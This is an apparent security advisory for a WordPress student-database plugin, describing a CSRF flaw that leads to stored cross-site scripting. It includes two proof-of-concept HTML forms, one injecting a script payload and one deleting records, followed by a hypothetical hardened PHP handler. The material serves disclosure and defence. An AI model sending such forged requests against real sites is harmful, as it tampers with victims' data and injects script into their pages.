Source: wpexploit
Author: Vinay Varma Mudunuri
ID: WPEX-ID:7548C1FB-77B5-4290-A297-35820EDFE0F8
Date: Aug 01, 2022 - 12:00 a.m.

Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF


CVSS3: 5.4 Medium

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

The plugin does not have CSRF checks in its AJAX actions, allowing attackers to make a logged-in user with a role as low as contributor add/edit and delete students via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, this could also lead to Stored Cross-Site Scripting.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
      <input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action= ssr_del_st_submit" method="POST">
      <input type="hidden" name="postID" value="<RID>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
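
What a handler for the `ssr_add_st_submit` action looks like once the three missing controls described above are present (nonce check, input sanitisation, output escaping). This is an added example, not the plugin's code or its actual fix. Assumptions: the `ssr_demo_*` function, nonce and table names, the `manage_options` capability, and registration through the `admin_action_` hook are all hypothetical; only the action name and the `rid` parameter come from the page.

```php
<?php
// Added illustration, not the plugin's code. Hypothetical names: the ssr_demo_*
// functions, nonce and table, and the choice of the manage_options capability.

// 1. The legitimate form carries a nonce bound to the user, session and action.
function ssr_demo_render_add_form() {
    $url = admin_url( 'admin.php?action=ssr_add_st_submit' );
    echo '<form action="' . esc_url( $url ) . '" method="POST">';
    wp_nonce_field( 'ssr_demo_add_student', 'ssr_demo_nonce' );
    echo '<input type="text" name="rid" />';
    echo '<input type="submit" value="Add student" /></form>';
}

// 2. The handler refuses any request that lacks a valid nonce. A cross-site
//    form like the ones above cannot supply one, so it stops here.
function ssr_demo_handle_add_student() {
    check_admin_referer( 'ssr_demo_add_student', 'ssr_demo_nonce' );

    // A nonce proves intent, not authority: check the capability separately.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Sanitise on input: strips tags and extra whitespace from rid.
    $rid = isset( $_POST['rid'] ) ? sanitize_text_field( wp_unslash( $_POST['rid'] ) ) : '';
    if ( '' === $rid ) {
        wp_die( 'Missing rid.', '', array( 'response' => 400 ) );
    }

    global $wpdb;
    $wpdb->insert( $wpdb->prefix . 'ssr_demo_students', array( 'rid' => $rid ), array( '%s' ) );
}
add_action( 'admin_action_ssr_add_st_submit', 'ssr_demo_handle_add_student' );

// 3. Escape on output as well, so a value stored earlier (or written by
//    another code path) is rendered as text instead of markup.
function ssr_demo_render_student_row( $rid ) {
    echo '<tr><td>' . esc_html( $rid ) . '</td></tr>';
}
```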
